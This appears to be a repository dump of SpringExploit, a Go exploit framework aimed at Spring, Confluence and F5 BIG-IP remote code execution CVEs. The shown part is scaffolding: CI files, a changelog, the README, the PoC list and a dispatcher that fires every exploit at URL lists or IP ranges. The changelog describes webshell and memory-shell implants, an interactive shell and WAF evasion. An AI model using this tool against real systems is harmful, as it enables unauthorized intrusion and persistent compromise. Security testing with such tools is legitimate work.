├── .github └── workflows │ ├── CHANGELOG.yml │ ├── maven.yml │ ├── release-binary.yml │ └── replace.yml ├── .gitignore ├── .goreleaser.yml ├── CHANGELOG.md ├── LICENSE ├── README.md ├── cmd ├── commons │ ├── attack │ │ ├── Pocslist.go │ │ └── attack.go │ ├── core │ │ ├── banner.go │ │ ├── doc.go │ │ ├── getreq.go │ │ ├── options.go │ │ ├── runner.go │ │ ├── update.go │ │ ├── update2.go │ │ └── update_test.go │ ├── poc │ │ ├── 2021 │ │ │ ├── CVE-2021-22986.go │ │ │ └── CVE-2021-26084.go │ │ ├── 2022 │ │ │ ├── CVE-2022-1388.go │ │ │ ├── CVE-2022-22947.go │ │ │ ├── CVE-2022-22963.go │ │ │ ├── CVE-2022-22965.go │ │ │ └── CVE-2022-26134.go │ │ ├── IsAliveUrl.go │ │ ├── PoC.go │ │ └── demo.go │ ├── req │ │ ├── request.go │ │ └── transform.go │ ├── resp │ │ └── resp.go │ └── utils │ │ ├── base64.go │ │ ├── dnslog.go │ │ ├── file.go │ │ ├── httpclient.go │ │ ├── ips.go │ │ ├── proxy.go │ │ ├── readfile.go │ │ ├── saveresult.go │ │ ├── setrequest.go │ │ └── useragent.go ├── logs │ └── LogToFile.go ├── main.go └── test │ ├── FileWriter.go │ ├── Strings.go │ ├── ants.go │ ├── checkerr.go │ ├── copymap.go │ ├── dnslog.go │ ├── emun.go │ ├── header.go │ ├── headurl.go │ ├── interface │ ├── demo.go │ ├── demo │ │ └── test.go │ ├── demo1.go │ └── test1.go │ ├── ip.go │ ├── prompt.go │ ├── test.go │ ├── test1.go │ ├── threads.go │ └── url.go ├── go.mod └── go.sum /.github/workflows/CHANGELOG.yml: -------------------------------------------------------------------------------- 1 | # .github/workflows/update-changelog.yaml 2 | name: "Update Changelog" 3 | 4 | on: 5 | release: 6 | types: [released] 7 | workflow_dispatch: 8 | 9 | jobs: 10 | update: 11 | runs-on: ubuntu-latest 12 | 13 | steps: 14 | - name: Checkout code 15 | uses: actions/checkout@v2 16 | with: 17 | ref: ${{ github.event.release.target_commitish }} 18 | 19 | - name: Update Changelog 20 | uses: stefanzweifel/changelog-updater-action@v1 21 | with: 22 | latest-version: ${{ github.event.release.tag_name }} 23 | release-notes: ${{ github.event.release.body }} 24 | 25 | - name: Commit updated CHANGELOG 26 | uses: stefanzweifel/git-auto-commit-action@v4 27 | with: 28 | branch: ${{ github.event.release.target_commitish }} 29 | commit_message: 🎆 Update CHANGELOG 30 | file_pattern: CHANGELOG.md 31 | -------------------------------------------------------------------------------- /.github/workflows/maven.yml: -------------------------------------------------------------------------------- 1 | name: Release Maven 2 | 3 | 4 | on: workflow_dispatch 5 | # on: 6 | # push: 7 | # tags: 8 | # - '*' 9 | #on: [push] 10 | 11 | 12 | 13 | jobs: 14 | build: 15 | runs-on: ubuntu-latest 16 | 17 | steps: 18 | - uses: actions/checkout@v2 19 | 20 | 21 | - name: Set up JDK 1.8 22 | uses: actions/setup-java@v1 23 | with: 24 | distribution: "Liberica" 25 | java-version: 1.8 26 | java-package: jdk+fx 27 | - name: Build with Maven 28 | run: 29 | mvn clean package -DskipTests=true -Dmaven.javadoc.skip=true -B -V 30 | - name: Create Release 31 | id: create_release 32 | uses: SummerSec/create-release@master 33 | with: 34 | tag_name: ${{ github.ref }} 35 | release-name: Release ${{ github.ref }} 36 | draft: false 37 | prerelease: false 38 | env: 39 | GITHUB_TOKEN: ${{ secrets.RELEASE }} 40 | 41 | 42 | - name: Upload a Build Artifact 43 | id: upload-build-artifact 44 | uses: actions/upload-artifact@v2.3.1 45 | with: 46 | # Artifact name 47 | # 修改打包后的文件名称 48 | name: # optional, default is artifact 49 | SPATool-${{steps.create_release.outputs.tag}}-SNAPSHOT-all.jar 50 | # A file, directory or wildcard pattern that describes what to upload 51 | path: 52 | target/*-SNAPSHOT-all.jar 53 | # The desired behavior if no files are found using the provided path. 54 | 55 | - name: Auto Upload Release 56 | id: upload-release-asset 57 | uses: actions/upload-release-asset@v1.0.1 58 | env: 59 | GITHUB_TOKEN: ${{secrets.RELEASE}} 60 | with: 61 | # 修改打包后的文件名称 62 | upload_url: ${{ steps.create_release.outputs.upload_url }} 63 | asset_path: target/SPATool-${{ steps.create_release.outputs.tag }}-SNAPSHOT-all.jar 64 | asset_name: SPATool-${{ steps.create_release.outputs.tag }}-SNAPSHOT-all.jar 65 | asset_content_type: application/java-archive 66 | 67 | 68 | -------------------------------------------------------------------------------- /.github/workflows/release-binary.yml: -------------------------------------------------------------------------------- 1 | name: 🎉 Release Binary 2 | on: 3 | create: 4 | tags: 5 | - v* 6 | workflow_dispatch: 7 | 8 | jobs: 9 | release: 10 | runs-on: ubuntu-latest 11 | steps: 12 | - name: "Check out code" 13 | uses: actions/checkout@v3 14 | with: 15 | fetch-depth: 0 16 | 17 | - name: "Set up Go" 18 | uses: actions/setup-go@v2 19 | with: 20 | go-version: 1.17 21 | 22 | - name: "Create release on GitHub" 23 | uses: goreleaser/goreleaser-action@v2 24 | with: 25 | args: "release --rm-dist" 26 | version: latest 27 | workdir: . 28 | env: 29 | GITHUB_TOKEN: "${{ secrets.RELEASE }}" 30 | -------------------------------------------------------------------------------- /.github/workflows/replace.yml: -------------------------------------------------------------------------------- 1 | name: Replace 2 | on: workflow_dispatch 3 | jobs: 4 | build: 5 | runs-on: ubuntu-latest 6 | steps: 7 | - uses: actions/checkout@v2 8 | - name: Find and Replace 9 | uses: SummerSec/gha-find-replace@master 10 | with: 11 | find: "SummerSec/template" 12 | replace: ${{ github.repository }} 13 | regex: false 14 | include: "README.md" # 需要替换的文件内容 15 | - name: Push changes 16 | uses: SummerSec/push@master # 更新README.md 17 | with: 18 | github_token: ${{ secrets.RELEASE }} # github token -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | .idea 2 | logs/** 3 | logs 4 | logs.txt 5 | **.exe 6 | **.zip 7 | **.tar.gz 8 | target.txt 9 | result.txt 10 | **.py 11 | urls.txt 12 | SpringExploit_**/** 13 | 14 | -------------------------------------------------------------------------------- /.goreleaser.yml: -------------------------------------------------------------------------------- 1 | before: 2 | hooks: 3 | - go mod tidy 4 | 5 | builds: 6 | - env: 7 | - CGO_ENABLED=0 8 | goos: 9 | - windows 10 | - linux 11 | - darwin 12 | goarch: 13 | - amd64 14 | - 386 15 | - arm 16 | - arm64 17 | 18 | # ignore: 19 | # - goos: darwin 20 | # goarch: '386' 21 | # - goos: windows 22 | # goarch: 'arm' 23 | # - goos: windows 24 | # goarch: 'arm64' 25 | 26 | binary: '{{ .ProjectName }}' 27 | main: cmd/main.go 28 | 29 | archives: 30 | - format: zip 31 | replacements: 32 | darwin: macOS 33 | 34 | checksum: 35 | algorithm: sha256 36 | -------------------------------------------------------------------------------- /CHANGELOG.md: -------------------------------------------------------------------------------- 1 | ## 0.1.9 - 2022-06-14 2 | 3 | ### Changelog 4 | 5 | - 24844a4 :bug: fix IsAliveUrl bug 6 | - 2097cb8 Merge branch 'main' of github.com:SummerSec/SpringExploit into main 7 | - 53479ac 🚲 使用前会自动检测是否最新版本并询问是否更新 8 | - b0ec7bd 🎆 Update CHANGELOG 9 | - b7db213 🛸 版本0.1.9 10 | 11 | ## 0.1.8 - 2022-06-08 12 | 13 | ### Changelog 14 | 15 | - c8f78f6 🪂 参考beichen实现CVE-2022-26134实现哥斯拉内存马注入 16 | - 64750da 🎆 Update CHANGELOG 17 | - 42533c3 🤦‍♂️ 版本0.1.8 18 | 19 | ## 0.1.7 - 2022-06-04 20 | 21 | ### Changelog 22 | 23 | - bffb4fc 🍓 版本0.1.7 24 | - 3019c68 🪂 修改CVE-2022-26134的Response头为Host 25 | - 48d898d 🎆 Update CHANGELOG 26 | - d20ac92 🚲 版本0.1.8 27 | - db8b225 Merge branch 'main' of github.com:SummerSec/SpringExploit into main 28 | - d166b83 🦽 改良版的url编码,默认对所以的字符都进行编码 29 | - 037bc88 🎆 Update CHANGELOG 30 | - 48c59e1 🚨 版本0.1.7 31 | 32 | ## 0.1.17 - 2022-06-04 33 | 34 | ### Changelog 35 | 36 | - db8b225 Merge branch 'main' of github.com:SummerSec/SpringExploit into main 37 | - d166b83 🦽 改良版的url编码,默认对所以的字符都进行编码 38 | - 037bc88 🎆 Update CHANGELOG 39 | - 48c59e1 🚨 版本0.1.7 40 | 41 | ## 0.1.6 - 2022-06-04 42 | 43 | ### Changelog 44 | 45 | - aeb69fa 🚂 增加CVE-2022-26134 && 修改部分代码 46 | - 3b32cb6 🚨 增加重定向参数,用户可以自定义是否要3xx跳转 47 | 48 | ## 0.1.5 - 2022-05-20 49 | 50 | ## Changelog 51 | 52 | - d738fc9 Merge branch 'main' of github.com:SummerSec/SpringExploit into main 53 | - 0c078ee 修复提交url的bug以及默认会重定向bug,目前不会301跳转。 54 | - 8dbfad1 Update .goreleaser.yml 55 | - 9fbc290 🎆 Update CHANGELOG 56 | - 09697b7 Merge branch 'main' of github.com:SummerSec/SpringExploit into main 57 | - 6a18326 🚂更新版本号0.1.5 58 | - 0c59be4 Update CHANGELOG 59 | 60 | ## 0.1.4 - 2022-05-18 61 | 62 | ## Changelog 63 | 64 | - ba5d3d8 Merge branch 'main' of github.com:SummerSec/SpringExploit into main 65 | - 3548f88 🛸使用go-github-update框架,替代原本go-update框架。原本框架在Linux体验并不是很好 66 | - 0ac73ce Update CHANGELOG 67 | - 25708c0 ✈️更新版本号到0.1.4 68 | 69 | ## 0.1.3 - 2022-05-18 70 | 71 | ## Changelog 72 | 73 | - 30cb9d8 🛵更新版本号0.1.3 74 | - 9b3540a 🎈请使用-update参数升级,Linux用户强烈建议升级。 75 | - 15c3651 修复bug,在Unix和类Unix(如Linux):换行符采用\n. Windows和MS-DOS:换行符采用\r\n。bug产生的原因是一味的直接去掉url结尾的两个字符 76 | - ecdd043 Merge branch 'main' of github.com:SummerSec/SpringExploit into main 77 | - 28915ef 使用-i参数时加入https协议,不在仅仅是http协议 78 | - 078dfde Update CHANGELOG 79 | 80 | ## 0.1.2 - 2022-05-16 81 | 82 | ## Changelog 83 | 84 | - 35b7c8e 使用-update参数更新,使用-version判断是否是最新版本。 85 | - a9681c3 alive 86 | - c1dcaeb 使用head请求判断url是否alive,如果url失效,默认不会跑所有的pocs,如果需要不判断是否alive请使用-p参数指定poc,如果仅仅需要判断url是否存活可以使用-p ISAlIVEURL 87 | - 5248f4e 更新版本号0.1.12 88 | - b2d8db5 恢复 89 | - 24d395c t 90 | - 3e8d06c Merge branch 'main' of github.com:SummerSec/SpringExploit into main 91 | - cf7af09 协程池换成ants框架,最多限度利用发挥内存作用 92 | - 1ab7c2a Update CHANGELOG 93 | 94 | ## 0.1.1 - 2022-05-12 95 | 96 | ## Changelog 97 | 98 | - 7554801 更新到0.1.1版本,建议使用SpringExploit -update 命令升级 99 | - 692ecf4 将req依赖更新到3.11.2版本彻底不会出现返回包nil问题 100 | - 3b0ce2c 跟新版本号0.1.1 101 | - c6c247c Merge branch 'main' of github.com:SummerSec/SpringExploit into main 102 | - 300cb49 CVE-2022-22965 检测更加准确 && 修复issue3中的问题 && 捕获返回包异常 103 | - 5f4837c Update CHANGELOG 104 | 105 | ## 0.1.0 - 2022-05-12 106 | 107 | ## Changelog 108 | 109 | - 4a33c39 0.1.0 110 | - 15c2543 fix CVE-2021-26084 bug 111 | - 9324301 Update .gitignore 112 | - 174df1e Merge branch 'main' of github.com:SummerSec/SpringExploit 113 | - b606a70 CVE-2022-1388 114 | - e5127e5 Update CHANGELOG 115 | 116 | ## 0.0.9 - 2022-05-10 117 | 118 | ## Changelog 119 | 120 | - 15937ad 解决[issues2](https://github.com/SummerSec/SpringExploit/issues/2)中的问题 121 | - 3e80282 报错优化 122 | - f8a04bf 支持CVE-2021-22986 123 | - 240b5f0 运行时的异常处理 124 | - 846611e 增加异常处理 125 | - 99f60e6 增加判断是否最新版本 126 | - 87f61b6 应用名字 127 | - baacdc3 更新测试 128 | - aaffbaf 参考nuclie实现self更新 129 | - b230672 Merge branch 'main' of github.com:SummerSec/SpringExploit into main 130 | - ed563fc 增加自动更新参数 131 | - d1ec3b4 Update CHANGELOG 132 | - 5d3a844 优化banner输出 133 | 134 | ## 0.0.8 - 2022-05-10 135 | 136 | ## Changelog 137 | 138 | - 6cba9b3 增加CVE-2022-1388 使用案例 139 | - 3461e7f 并发优化 140 | - 3b93f17 CVE-2022-1388 命令执行返回的结果为base64加密,防止waf识别 141 | - 7615e78 CVE-2022-1388漏洞支持交互shell执行命令 142 | - ac215b3 命令组合方式 143 | - 45a7b97 README 增加使用说明案例 144 | - f194ae8 支持漏洞 CVE-2022-1388 验证 145 | - 8876309 Update CHANGELOG 146 | 147 | ## 0.0.7 - 2022-05-06 148 | 149 | ## Changelog 150 | 151 | - 1bfdf73 fix 152 | - fa42516 fix CVE-2021-26084验证错误 153 | - 6108c83 fix CVE-2021-26084验证错误 154 | - 6dbd2fe Merge branch 'main' of github.com:SummerSec/SpringExploit into main 155 | - daacabc 修复没有指定poc时的bug 156 | - 0888584 Update CHANGELOG 157 | 158 | ## 0.0.6 - 2022-05-06 159 | 160 | ## Changelog 161 | 162 | - bfb7993 对 cloud getway漏洞判断漏洞增强 163 | - c9bbe0a 支持CVE-2022-22965漏洞 164 | - df6b52d 添加show pocs list参数 输出支持pocs列表 165 | - 4cf4ad4 支持指定poc 166 | - ddf75df ip段的处理 167 | - a9ff698 Merge branch 'main' of github.com:SummerSec/SpringExploit into main 168 | - deaf20a 重构了pocs的目录结构 添加两个参数i和p,后续支持指定vul和ip段 169 | - 70399b6 Update CHANGELOG 170 | 171 | ## 0.0.5 - 2022-04-27 172 | 173 | ## Changelog 174 | 175 | - 1282404 CHANGELOG 176 | - fc7144f CHANGELOG.yml 177 | - 9d28d03 read 178 | - e4b8294 CHANGELOG.yml 179 | - 1084f44 0.0.5 180 | - 7193523 支持CVE-2021-26084漏洞利用,利用成功默认上传蚁剑 181 | - 6bda2ab TODO 182 | 183 | ## 0.0.4 184 | 185 | - [x] 添加支持CVE-2022-22963 (Spring Cloud Function SpEL RCE) 186 | 187 | ## 0.0.3 188 | 189 | - [x] 支持漏洞CVE-2022-22947 (Spring Cloud Gateway SpELRCE)的漏洞利用 190 | - [x] 自定义并发 191 | - [x] 自定义输出日志位置 192 | - [x] 自定义结果输出位置 193 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 夏天 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 |

3 | SpringExploit 4 | 5 | SpringExploit 6 | Forks 7 | Release 8 | Stars 9 | Follower 10 | Visitor 11 | SecSummers 12 | 13 | 14 |

15 | 16 | 17 | 18 | ## 📝 TODO 19 | 20 | * [x] 添加支持CVE-2022-22947 (Spring Cloud Gateway SpELRCE) 21 | * [x] 添加支持CVE-2022-22963 (Spring Cloud Function SpEL RCE) 22 | * [x] 添加支持CVE-2021-26084 (Atlassian Confluence RCE) 23 | * [x] 添加支持CVE-2022-26134 (Atlassian Confluence Unauth RCE) 24 | * [x] 添加支持CVE-2022-22965 (Spring Core RCE) 25 | * [x] 添加支持CVE-2022-1388 (F5 BIG-IP RCE) 26 | * [x] 自定义并发 27 | * [x] 自定义输出日志位置 28 | * [x] 自定义结果输出位置 29 | * [x] 支持自定义漏洞利用 30 | * [x] 支持指定ip段eg: 192.168.0.0/24 31 | * [x] 命令执行漏洞式支持交互式执行命令 32 | * [x] 验证url是否存活 33 | * [x] 增加自动更新参数,增加判断是否存在是最新版本 (-version参数) 34 | * [x] 随机User-Agent请求头 35 | 36 | ……… 37 | 38 | 39 | 40 | --- 41 | ## 🐉 来龙去脉 42 | 43 | 为了学习一下golang,花了两天时间,写了这款框架式的exp利用工具练练手,后续还会支持其他的漏洞。初学golang,代码还是很粗糙。一开始是打算就支持Spring系列漏洞的利用,但写到后面自我感觉能够集成其他的漏洞利用。具体会支持那些漏洞,作者会根据情况自我判断,可以提建议,但不一定被采纳。亦可以提交pr。可以查看源代码写poc和exp,写了很多注释,很容易懂。 44 | 45 | 本项目集成的漏洞基本上都是能会被利用的,直接或间接执行命令或者连接webshell,且本地测试通过的。 46 | 47 | 项目已经开了讨论区,如果有建议可以在讨论区提出。 48 | 49 | --- 50 | ## ⚡下载安装 51 | 52 | 在[release](https://github.com/SummerSec/SpringExploit/releases)界面下载对应操作系统版本,因为本项目使用GitHub Action自动编译,不存在后门风险,如果需要自己下载源码手动编译,请自行百度,不会解答这类问题。 53 | 54 | 55 | 56 | 57 | 58 | --- 59 | ## 🎬 使用方法 60 | 61 | ```cmd 62 | -f 指定文件 -p 指定poc(如果没有-p参数默认跑全部pocs) -m 1 开启debug日志, 默认不开启 -t threads数量 63 | 64 | SpringExploit -f urls.txt -p CVE20221388 -m 1 -t 10 65 | 66 | -proxy 设置代理 -o 保存结果文件位置 -log 日志文件输出位置默认logs/logs-{time}.txt 67 | SpringExploit -u https://www.baidu.com/ -proxy http://127.0.0.1:1080 -o result.txt -log logs/logs.txt 68 | 69 | 还有更多好玩的组合方式,自行探索。除了-f -u -i 三个不能在一个组合命令出现,其他都可以组合成命令。 70 | 71 | example usages: 72 | 73 | SpringExploit -f urls.txt -t 50 74 | SpringExploit -u https://www.baidu.com/ -proxy http://127.0.0.1:1080 75 | SpringExploit -i 127.0.0.1/24 76 | SpringExploit -u https://www.baidu.com/ -p CVE202222947,CVE202222963 77 | SpringExploit -u https://www.baidu.com/ -p CVE20221388 -shell 78 | 79 | 使用head请求判断url是否alive,如果url失效,默认不会跑所有的pocs,如果需要不判断是否alive请使用-p参数指定poc,如果仅仅需要判断url是否存活可以使用-p ISAlIVEURL 80 | SpringExploit -sp 81 | 82 | ``` 83 | 84 | ![image-20220422190411847](https://cdn.jsdelivr.net/gh/SummerSec/Images/2022/03/19u419ec19u419ec.png) 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | ---- 95 | 96 | 97 | 98 | 99 | ## 🅱️ 免责声明 100 | 101 | 该工具仅用于安全自查检测 102 | 103 | 由于传播、利用此工具所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。 104 | 105 | 本人拥有对此工具的修改和解释权。未经网络安全部门及相关部门允许,不得善自使用本工具进行任何攻击活动,不得以任何方式将其用于商业目的。 106 | 107 | 该工具只授权于企业内部进行问题排查,请勿用于非法用途,请遵守网络安全法,否则后果作者概不负责 108 | 109 | ---- 110 | 111 | ![as](https://starchart.cc/SummerSec/SpringExploit.svg) 112 | -------------------------------------------------------------------------------- /cmd/commons/attack/Pocslist.go: -------------------------------------------------------------------------------- 1 | package attack 2 | 3 | import "container/list" 4 | 5 | const ( 6 | ISAlIVEURL string = "ISAlIVEURL" 7 | 8 | // 2022年list 9 | 10 | CVE202226134 string = "CVE202226134" 11 | CVE202222963 string = "CVE202222963" 12 | CVE202222965 string = "CVE202222965" 13 | CVE202222947 string = "CVE202222947" 14 | CVE20221388 string = "CVE20221388" 15 | 16 | // 2021年list 17 | 18 | CVE202126084 string = "CVE202126084" 19 | CVE202122986 string = "CVE202122986" 20 | ) 21 | 22 | func GetList() *list.List { 23 | l := list.New() 24 | 25 | l.PushBack(ISAlIVEURL) 26 | 27 | // 2022年漏洞 28 | l.PushBack(CVE202226134) 29 | l.PushBack(CVE202222963) 30 | l.PushBack(CVE202222965) 31 | l.PushBack(CVE202222947) 32 | l.PushBack(CVE20221388) 33 | 34 | // 2021年漏洞 35 | l.PushBack(CVE202126084) 36 | l.PushBack(CVE202122986) 37 | 38 | return l 39 | } 40 | -------------------------------------------------------------------------------- /cmd/commons/attack/attack.go: -------------------------------------------------------------------------------- 1 | package attack 2 | 3 | import ( 4 | "github.com/SummerSec/SpringExploit/cmd/commons/poc" 5 | _021 "github.com/SummerSec/SpringExploit/cmd/commons/poc/2021" 6 | _022 "github.com/SummerSec/SpringExploit/cmd/commons/poc/2022" 7 | log "github.com/sirupsen/logrus" 8 | "strings" 9 | ) 10 | 11 | func Sevice(url string, hashmap map[string]interface{}) { 12 | log.Debugf("[*] Start attack %s", url) 13 | pocs := make(map[string]interface{}) 14 | a := addPoc(pocs) 15 | //for k, v := range hashmap { 16 | // log.Debugln("key: ", k, " value: ", v) 17 | //} 18 | //for _, v := range a { // 循环调用poc 19 | // t := v.(poc.PoC) 20 | // t.SendPoc(url, hashmap) 21 | //} 22 | attack(url, a, hashmap) 23 | 24 | } 25 | 26 | func init() { 27 | log.Debug("[*] Init attack") 28 | } 29 | 30 | func addPoc(pocs map[string]interface{}) map[string]interface{} { 31 | log.Debug("[*] Add PoC") 32 | // 判断url是否存活 33 | pocs["ISAlIVEURL"] = &poc.IsAliveUrl{} 34 | 35 | // TODO 添加 2022 poc 36 | //pocs["demo"] = &poc.Demo{} 37 | pocs["CVE202226134"] = &_022.CVE202226134{} 38 | pocs["CVE202222947"] = &_022.CVE202222947{} 39 | pocs["CVE202222963"] = &_022.CVE202222963{} 40 | pocs["CVE202222965"] = &_022.CVE202222965{} 41 | pocs["CVE20221388"] = &_022.CVE20221388{} 42 | 43 | // TODO 添加2021 poc 44 | pocs["CVE202122986"] = &_021.CVE202122986{} 45 | pocs["CVE202126084"] = &_021.CVE202126084{} 46 | 47 | return pocs 48 | 49 | } 50 | 51 | func attack(url string, pocs map[string]interface{}, hashmap map[string]interface{}) { 52 | p := hashmap["Pocs"].(string) 53 | // 以,分割,获取poc name 将其转换为数组 54 | pocsName := strings.Split(p, ",") 55 | //log.Debugf("[*] Pocs: %s", pocsName) 56 | //var ps []string 57 | //if pocsName != nil { 58 | // for _, v := range pocsName { 59 | // log.Debugf("[*] 分割字符串 %s", v) 60 | // ps = append(ps, v) 61 | // } 62 | //} 63 | // 如果没有选定字符串 则默认所有pocs 64 | if len(pocsName) == 1 && pocsName[0] == "" { 65 | f := pocs["ISAlIVEURL"].(poc.PoC).CheckExp(nil, url, hashmap) 66 | if f { 67 | log.Infof("[*] %s is alive", url) 68 | } else { 69 | log.Infof("[*] %s is not alive, donot attack all pocs, Please check url is alive ?", url) 70 | return 71 | } 72 | log.Info("[*] attack all pocs") 73 | for k, v := range pocs { 74 | if k == "ISAlIVEURL" { 75 | continue 76 | } 77 | log.Infof("[*] attack %s poc %s", url, k) 78 | t := v.(poc.PoC) 79 | t.SendPoc(url, hashmap) 80 | } 81 | } else { 82 | for _, v := range pocsName { 83 | log.Infof("[*] attack %s poc %s", url, v) 84 | if v != "" { 85 | t := pocs[v].(poc.PoC) 86 | t.SendPoc(url, hashmap) 87 | } 88 | } 89 | } 90 | 91 | } 92 | -------------------------------------------------------------------------------- /cmd/commons/core/banner.go: -------------------------------------------------------------------------------- 1 | package core 2 | 3 | import ( 4 | "fmt" 5 | ) 6 | 7 | const banner = ` 8 | _________ .__ ___________ .__ .__ __ 9 | / _____/______ _______ |__| ____ ____ \_ _____/___ _________ | | ____ |__|_/ |_ 10 | \_____ \ \____ \\_ __ \| | / \ / ___\ | __)_ \ \/ /\____ \ | | / _ \ | |\ __\ 11 | / \| |_> >| | \/| || | \/ /_/ > | \ > < | |_> >| |__( <_> )| | | | 12 | /_______ /| __/ |__| |__||___| /\___ / /_______ //__/\_ \| __/ |____/ \____/ |__| |__| 13 | \/ |__| \//_____/ \/ \/|__| 14 | 15 | ` 16 | 17 | // TODO 修改版本号 18 | const version = "0.1.10" 19 | 20 | func ShowBanner() { 21 | fmt.Println(banner) 22 | fmt.Println("\t\t\tAuthor: SummerSec Version:", version+" Github: https://Github.com/SummerSec\n") 23 | 24 | } 25 | -------------------------------------------------------------------------------- /cmd/commons/core/doc.go: -------------------------------------------------------------------------------- 1 | package core 2 | -------------------------------------------------------------------------------- /cmd/commons/core/getreq.go: -------------------------------------------------------------------------------- 1 | package core 2 | 3 | // GetReq get request 4 | func GetReq() map[string]string { 5 | var req = map[string]string{ 6 | "method": "GET", 7 | } 8 | return req 9 | 10 | } 11 | -------------------------------------------------------------------------------- /cmd/commons/core/options.go: -------------------------------------------------------------------------------- 1 | package core 2 | 3 | import ( 4 | "flag" 5 | "fmt" 6 | "github.com/SummerSec/SpringExploit/cmd/commons/attack" 7 | "github.com/SummerSec/SpringExploit/cmd/logs" 8 | log "github.com/sirupsen/logrus" 9 | ) 10 | 11 | type Options struct { 12 | // 日志级别 13 | Mode int 14 | // file to read 15 | File string 16 | // 传入的url 17 | Url string 18 | // 设置超时时间 19 | Timeout int 20 | 21 | // 代理设置 22 | Proxy string 23 | 24 | // 版本号 25 | Version bool 26 | // 是否输出详细信息 27 | Verbose bool 28 | // 线程数量 29 | Thread int 30 | // 日志输出文件 31 | LogFile string 32 | // 重复请求次数 33 | Retry int 34 | 35 | // 保存结果 36 | Out string 37 | 38 | // pocs 选择特定的poc 39 | Pocs string 40 | // ip 段 41 | IP string 42 | // show pocs list 43 | SP bool 44 | 45 | // 是否进入交互shell 46 | Shell bool 47 | // 强制开启HTTP 1.1 48 | H1 bool 49 | // 更新到最新版本 50 | Update bool 51 | // 重定向 52 | Redirect bool 53 | } 54 | 55 | func (o Options) toString() interface{} { 56 | 57 | return o 58 | } 59 | 60 | func ParseOptions() *Options { 61 | options := &Options{} 62 | flag.IntVar(&options.Mode, "m", 0, "debug mode off (debug mode = 1) default mode = 0") 63 | flag.IntVar(&options.Thread, "t", 50, "threads number ") 64 | flag.StringVar(&options.File, "f", "", "file to read example: -file=test.txt http(s)://host:port/path/ (notes: The last line must be empty)") 65 | flag.StringVar(&options.Url, "u", "", "url to read example: -url=http://www.baidu.com:80/") 66 | flag.StringVar(&options.Proxy, "proxy", "", "proxy example: -proxy=http(socks5)://127.0.0.1:8080 ") 67 | flag.BoolVar(&options.Version, "version", false, "show version") 68 | flag.BoolVar(&options.Verbose, "verbose", false, "show verbose") 69 | flag.BoolVar(&options.SP, "sp", false, "show pocs list") 70 | flag.StringVar(&options.LogFile, "log", "", "log file example: -log=/logs/logs.txt") 71 | flag.IntVar(&options.Retry, "retry", 1, "repeat request times") 72 | //flag.StringVar(&options.IP, "i", "", "ip segment example: -ip=192.168.0.1/24 ") 73 | flag.IntVar(&options.Timeout, "timeout", 10, "timeout") 74 | flag.StringVar(&options.Out, "o", "result.txt", "out file example: -o=result.txt default result.txt") 75 | flag.StringVar(&options.Pocs, "p", "", "pocs example: -p=CVE202222947,CVE202122963,poc3") 76 | flag.StringVar(&options.IP, "i", "", "ip segment example: -i=192.168.1.1/32") 77 | flag.BoolVar(&options.Shell, "shell", false, "whether to enter the interactive shell") 78 | flag.BoolVar(&options.H1, "h1", false, "force to use HTTP 1.1") 79 | flag.BoolVar(&options.Update, "update", false, "update to the latest version") 80 | flag.BoolVar(&options.Redirect, "redirect", false, "whether to follow redirect") 81 | flag.Parse() 82 | 83 | // TODO 修改版本号 84 | logs.SaveLogs(options.LogFile) 85 | ShowBanner() 86 | showVerbose(options) 87 | confirmAndSelfUpdate() 88 | 89 | if options.Version { 90 | //ShowBanner(v) 91 | } else if url := options.Url; url != "" { 92 | options.Thread = 1 93 | options.File = "" 94 | //ShowBanner(v) 95 | } else if options.File != "" { 96 | options.Url = "" 97 | //ShowBanner(v) 98 | } else if options.IP != "" { 99 | options.File = "" 100 | options.Url = "" 101 | } else if options.SP { 102 | showPocsList() 103 | } else if options.Update { 104 | } else { 105 | //ShowBanner(v) 106 | flag.PrintDefaults() 107 | } 108 | 109 | return options 110 | 111 | } 112 | 113 | func showPocsList() { 114 | fmt.Println("Pocs list: ") 115 | ls := attack.GetList() 116 | // 遍历list,输出pocs名称 117 | for i := ls.Front(); i != nil; i = i.Next() { 118 | fmt.Println(i.Value) 119 | } 120 | } 121 | 122 | func showVerbose(options *Options) { 123 | if !options.Verbose { 124 | switch options.Mode { 125 | case 1: 126 | log.SetLevel(log.DebugLevel) 127 | case 2: 128 | log.SetLevel(log.FatalLevel) 129 | case 3: 130 | log.SetLevel(log.ErrorLevel) 131 | case 4: 132 | log.SetLevel(log.WarnLevel) 133 | case 5: 134 | log.SetLevel(log.InfoLevel) 135 | case 6: 136 | log.SetLevel(log.PanicLevel) 137 | case 7: 138 | log.SetLevel(log.TraceLevel) 139 | default: 140 | log.SetLevel(log.InfoLevel) 141 | //log.SetLevel(log.DebugLevel) 142 | } 143 | } else { 144 | log.SetLevel(log.DebugLevel) 145 | } 146 | 147 | } 148 | -------------------------------------------------------------------------------- /cmd/commons/core/runner.go: -------------------------------------------------------------------------------- 1 | package core 2 | 3 | import ( 4 | "encoding/json" 5 | "github.com/SummerSec/SpringExploit/cmd/commons/attack" 6 | "github.com/SummerSec/SpringExploit/cmd/commons/utils" 7 | "github.com/fatih/structs" 8 